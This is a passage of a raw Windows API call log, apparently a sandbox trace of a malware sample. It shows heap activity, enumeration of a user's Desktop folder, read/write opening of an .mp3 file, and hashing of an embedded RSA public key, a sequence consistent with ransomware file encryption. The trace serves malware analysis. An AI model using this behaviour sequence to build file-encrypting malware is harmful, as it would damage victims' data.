dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.849] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\") returned="NcPu25RMbC\\" [0100.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0100.849] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0100.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5b30 [0100.849] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0100.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0100.849] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0100.849] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0100.849] PathFindFileNameW (pszPath="") returned="" [0100.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.849] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53a0610, ftCreationTime.dwHighDateTime=0x1d5bb86, ftLastAccessTime.dwLowDateTime=0x43998df0, ftLastAccessTime.dwHighDateTime=0x1d5ba04, ftLastWriteTime.dwLowDateTime=0x43998df0, ftLastWriteTime.dwHighDateTime=0x1d5ba04, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0100.849] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53a0610, ftCreationTime.dwHighDateTime=0x1d5bb86, ftLastAccessTime.dwLowDateTime=0x43998df0, ftLastAccessTime.dwHighDateTime=0x1d5ba04, ftLastWriteTime.dwLowDateTime=0x43998df0, ftLastWriteTime.dwHighDateTime=0x1d5ba04, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.849] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5008cb0, ftCreationTime.dwHighDateTime=0x1d5bd66, ftLastAccessTime.dwLowDateTime=0x2009b1a0, ftLastAccessTime.dwHighDateTime=0x1d5b9d0, ftLastWriteTime.dwLowDateTime=0x2009b1a0, ftLastWriteTime.dwHighDateTime=0x1d5b9d0, nFileSizeHigh=0x0, nFileSizeLow=0x14522, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gxHYHDN.mp3", cAlternateFileName="")) returned 1 [0100.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0100.849] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\gxHYHDN.mp3") returned=".mp3" [0100.849] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NcPu25RMbC\\gxHYHDN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ncpu25rmbc\\gxhyhdn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.850] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=83234) returned 1 [0100.850] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.852] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x144fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.852] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.854] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x14522, lpOverlapped=0x0) returned 1 [0100.854] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.854] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.854] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.854] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0100.855] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.855] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.855] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.855] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.855] GetLastError () returned 0x0 [0100.856] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.856] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0100.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.856] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.856] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.856] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14520) returned 0x9bb8968 [0100.856] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5b30 [0100.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e60 [0100.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5b78 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e78 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ea8 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ec0 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.857] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ea8 | out: hHeap=0x630000) returned 1 [0100.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ec0 | out: hHeap=0x630000) returned 1 [0100.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ec0 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7ea8 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ec0 | out: hHeap=0x630000) returned 1 [0100.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ea8 | out: hHeap=0x630000) returned 1 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.858] GetCurrentThreadId () returned 0x42c [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba77c8 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.858] GetCurrentThreadId () returned 0x42c [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ea8 [0100.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ec0 [0100.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e90 [0100.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.859] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ed8 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ea8 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ea8 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ea8 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ed8 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ec0 | out: hHeap=0x630000) returned 1 [0100.861] HeapFree (in: hHeap=0x630000, 